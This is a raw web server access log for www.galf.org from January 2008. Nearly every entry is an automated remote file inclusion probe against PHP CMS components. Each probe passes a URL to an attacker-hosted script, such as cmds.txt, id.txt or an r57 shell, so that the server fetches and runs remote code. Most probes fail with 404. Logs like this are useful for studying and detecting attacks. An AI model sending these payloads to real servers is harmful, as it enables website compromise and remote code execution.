62.75.168.187 - - [13/Jan/2008:11:42:39 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:11:42:39 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:42:39 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:11:42:40 -0800] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.240.50.2 - - [13/Jan/2008:11:43:18 -0800] "GET /logs/access_070709.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.240.50.2 - - [13/Jan/2008:11:43:19 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.240.50.2 - - [13/Jan/2008:11:43:19 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:11:43:23 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:11:43:23 -0800] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:43:27 -0800] "GET /logs/access_071119.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:43:39 -0800] "GET /logs/access_071029.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:11:43:39 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.164.131 - - [13/Jan/2008:11:43:45 -0800] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:44:02 -0800] "GET /logs/access_071203.log//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:44:03 -0800] "GET /logs/access_071203.log//modules/agendax/addevent.inc.php?agendax_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:44:08 -0800] "GET /logs/access_071203.log//modules/agendax/addevent.inc.php?agendax_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.168.187 - - [13/Jan/2008:11:44:09 -0800] "GET /logs/access_071203.log//modules/agendax/addevent.inc.php?agendax_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.85.189.34 - - [13/Jan/2008:11:44:22 -0800] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.213.160 - - [13/Jan/2008:11:44:40 -0800] "GET /vwar/admin/?vwar_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.91.224.7 - - [13/Jan/2008:11:44:47 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [13/Jan/2008:11:44:48 -0800] "GET / HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
208.80.193.43 - - [13/Jan/2008:11:45:47 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=45&ct=result HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc2; i686 Linux; 20020423)" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:11:45:52 -0800] "GET //?mosConfig_absolute_path=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
125.247.151.130 - - [13/Jan/2008:11:45:56 -0800] "GET /logs/access_070826.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
125.247.151.130 - - [13/Jan/2008:11:45:56 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
125.247.151.130 - - [13/Jan/2008:11:45:57 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.250.236.2 - - [13/Jan/2008:11:46:03 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.250.236.2 - - [13/Jan/2008:11:46:03 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.250.236.2 - - [13/Jan/2008:11:46:03 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.167.33 - - [13/Jan/2008:11:47:00 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
81.169.167.33 - - [13/Jan/2008:11:47:00 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
77.91.224.7 - - [13/Jan/2008:11:47:10 -0800] "GET /cendoc.php HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:48:11 -0800] "GET /logs/access_070924.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:11:48:36 -0800] "GET /logs/access_070910.log//modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:11:48:38 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.221.86.240 - - [13/Jan/2008:11:48:40 -0800] "GET /logs/access_071231.log/scanhttp://coldrabbits.com/test/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.69.218.144 - - [13/Jan/2008:11:48:42 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.galf.org"
212.69.218.144 - - [13/Jan/2008:11:48:43 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.galf.org"
216.221.86.240 - - [13/Jan/2008:11:48:43 -0800] "GET /scanhttp://coldrabbits.com/test/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.221.86.240 - - [13/Jan/2008:11:48:44 -0800] "GET /logs/scanhttp://coldrabbits.com/test/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:48:49 -0800] "GET /logs/access_071008.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:11:49:06 -0800] "GET /vwar/admin/?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.240.89 - - [13/Jan/2008:11:49:07 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.240.89 - - [13/Jan/2008:11:49:23 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:49:52 -0800] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:49:52 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:50:05 -0800] "GET /logs/access_070709.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:50:05 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:50:11 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.189.224.45 - - [13/Jan/2008:11:50:35 -0800] "GET /logs/access_071001.log/main.php?id=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:50:44 -0800] "GET /logs/access_070618.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:11:50:46 -0800] "GET /logs/access_070806.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:11:50:53 -0800] "GET /logs/access_071029.log//modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.75 - - [13/Jan/2008:11:50:59 -0800] "GET /logs/access.log HTTP/1.0" 200 61597 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.98.99.250 - - [13/Jan/2008:11:51:24 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
125.247.151.130 - - [13/Jan/2008:11:51:33 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.67.17.138 - - [13/Jan/2008:11:52:08 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.17.138 - - [13/Jan/2008:11:52:13 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:52:14 -0800] "GET /logs/access_071028.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.6.8.75 - - [13/Jan/2008:11:52:15 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 131072 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
205.234.132.157 - - [13/Jan/2008:11:52:52 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.132.157 - - [13/Jan/2008:11:52:56 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:52:59 -0800] "GET /logs/access_070820.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:53:08 -0800] "GET /logs/access_070806.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:53:33 -0800] "GET /logs/access_071028.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
80.51.87.246 - - [13/Jan/2008:11:53:49 -0800] "GET /logs/access_070826.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.51.87.246 - - [13/Jan/2008:11:53:49 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:11:53:50 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:11:53:50 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:11:53:50 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.51.87.246 - - [13/Jan/2008:11:53:50 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.98.99.250 - - [13/Jan/2008:11:54:12 -0800] "GET //vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.128.204.2 - - [13/Jan/2008:11:54:32 -0800] "GET /logs/access_070709.log//?mosConfig_absolute_path=http://www.freewebs.com/haramitel/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
80.51.87.246 - - [13/Jan/2008:11:54:59 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.89.31.62 - - [13/Jan/2008:11:54:59 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.89.31.62 - - [13/Jan/2008:11:54:59 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.krex.tv//modules/jobs/resumes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [13/Jan/2008:11:56:11 -0800] "GET /logs/access_070917.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.132.157 - - [13/Jan/2008:11:56:51 -0800] "GET /logs/access_071112.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.132.157 - - [13/Jan/2008:11:56:51 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.200.51.200 - - [13/Jan/2008:11:56:53 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.200.51.200 - - [13/Jan/2008:11:56:54 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.234.132.157 - - [13/Jan/2008:11:56:55 -0800] "GET /logs/access_071112.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.132.157 - - [13/Jan/2008:11:56:55 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.194.246 - - [13/Jan/2008:11:57:20 -0800] "GET /logs/index.php?abs_path=http://tukangbecak.com/r57.pdf?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.194.246 - - [13/Jan/2008:11:57:23 -0800] "GET /index.php?abs_path=http://tukangbecak.com/r57.pdf?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:58:46 -0800] "GET /vwar/admin/?vwar_root=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.132.157 - - [13/Jan/2008:11:58:54 -0800] "GET /logs/access_070827.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:11:59:01 -0800] "GET //?mosConfig_absolute_path=http://claroline.lct-net.cl/claroline/errors.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
209.90.77.54 - - [13/Jan/2008:11:59:29 -0800] "GET /logs/access_070917.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/carneline0817/tools/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.132.157 - - [13/Jan/2008:11:59:37 -0800] "GET /logs/access_070827.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.213.160 - - [13/Jan/2008:12:00:19 -0800] "GET /logs/access_071105.log/vwar/admin/?vwar_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.160 - - [13/Jan/2008:12:00:20 -0800] "GET /logs/vwar/admin/?vwar_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:12:00:48 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:12:00:48 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.108 - - [13/Jan/2008:12:00:48 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.25.2 - - [13/Jan/2008:12:01:56 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.201.130 - - [13/Jan/2008:12:02:17 -0800] "GET /logs/access_070917.log//login.php?dir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.201.130 - - [13/Jan/2008:12:02:18 -0800] "GET //login.php?dir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.201.130 - - [13/Jan/2008:12:02:18 -0800] "GET /logs//login.php?dir=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.25.2 - - [13/Jan/2008:12:02:43 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.80.193.35 - - [13/Jan/2008:12:02:49 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=50&ct=result HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312465)" "www.galf.org"
200.222.110.249 - - [13/Jan/2008:12:03:56 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.176.228.30 - - [13/Jan/2008:12:04:46 -0800] "GET /modules/Forums/bb_smilies.php?name=http://visual-addicts.com/roren/wp-content/gallery/echo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:06:19 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:06:20 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [13/Jan/2008:12:06:20 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.98.99.250 - - [13/Jan/2008:12:06:38 -0800] "GET /logs/access_070806.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.99.250 - - [13/Jan/2008:12:06:38 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:12:07:24 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
69.10.135.176 - - [13/Jan/2008:12:07:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
212.241.213.160 - - [13/Jan/2008:12:07:33 -0800] "GET /logs/access_071217.log/vwar/admin/?vwar_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:07:44 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:07:45 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.170.162 - - [13/Jan/2008:12:07:45 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.25.2 - - [13/Jan/2008:12:08:02 -0800] "GET /logs/access_071112.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.25.2 - - [13/Jan/2008:12:08:02 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
